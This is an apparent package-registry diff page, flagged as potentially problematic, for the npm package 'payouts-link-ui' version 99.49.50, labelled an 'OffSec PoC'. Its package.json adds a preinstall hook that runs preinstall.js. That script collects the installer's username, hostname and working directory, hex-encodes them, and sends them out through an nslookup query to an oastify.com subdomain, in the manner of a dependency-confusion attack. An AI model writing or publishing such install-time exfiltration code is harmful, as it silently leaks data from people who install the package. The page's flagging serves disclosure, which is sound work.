payouts-link-ui 99.49.50

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of payouts-link-ui might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +1 -0
  2. package/package.json +13 -0
  3. package/preinstall.js +23 -0
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log("OffSec PoC")
package/package.json ADDED
@@ -0,0 +1,13 @@
1
+ {
2
+ "name": "payouts-link-ui",
3
+ "version": "99.49.50",
4
+ "description": "Internal PoC by OffSec Team",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node preinstall.js"
8
+ },
9
+ "author": "MM",
10
+ "license": "MIT",
11
+ "dependencies": {}
12
+ }
13
+
package/preinstall.js ADDED
@@ -0,0 +1,23 @@
1
+ const os = require('os');
2
+ const { execSync } = require('child_process');
3
+
4
+ // Collect data
5
+ const username = os.userInfo().username;
6
+ const hostname = os.hostname();
7
+ const currentPath = process.cwd();
8
+
9
+ // Convert to hex
10
+ const toHex = (str) => Buffer.from(str, 'utf8').toString('hex');
11
+
12
+ // Hex-encode data
13
+ const hexData = `${toHex(username)}.${toHex(hostname)}.${toHex(currentPath.replace(/\//g, '-'))}`;
14
+
15
+ // Construct DNS query
16
+ const dnsQuery = `nslookup ${hexData}.ufd8urohc988b1a8owm8wlvuxl3cr2fr.oastify.com`;
17
+
18
+ // Execute DNS query to exfiltrate data
19
+ try {
20
+ execSync(dnsQuery);
21
+ } catch (error) {
22
+ console.error(`Error: ${error.message}`);
23
+ }